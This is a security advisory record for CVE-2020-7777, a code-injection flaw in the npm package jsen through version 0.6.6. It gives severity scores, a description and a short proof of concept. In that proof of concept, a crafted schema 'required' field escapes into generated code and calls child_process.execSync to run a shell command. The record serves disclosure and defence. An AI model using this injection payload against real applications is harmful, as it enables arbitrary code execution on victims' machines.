CVE-2020-7777 – jsen

Package

Manager: npm
Name: jsen
Vulnerable Version: >=0 <=0.6.6

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

EPSS: 0.0098 pctl0.75886

Details

Code Injection in jsen This affects all versions of package jsen. If an attacker can control the schema file, it could run arbitrary JavaScript code on the victim machine. In the module description and README file there is no mention about the risks of untrusted schema files, so it is assumed that this is applicable. In particular the required field of the schema is not properly sanitized. The resulting string that is build based on the schema definition is then passed to a `Function.apply();`, leading to an Arbitrary Code Execution. ### PoC ```js const jsen = require('jsen'); let schema = JSON.parse( { &quot;type&quot;: &quot;object&quot;, &quot;properties&quot;: { &quot;username&quot;: { &quot;type&quot;: &quot;string&quot; } }, &quot;required&quot;: [&quot;\\&quot;+process.mainModule.require(\&#39;child_process\&#39;).execSync(\&#39;touch malicious\&#39;)+\\&quot;&quot;] } ); const validate = jsen(schema); validate({}); ```

Metadata

Created: 2022-02-10T20:18:37Z
Modified: 2023-09-11T23:08:53Z
Source: MANUAL
CWE IDs: ["CWE-94"]
Alternative ID: GHSA-vm64-cfqx-3698
Finding: F422
Auto approve: 1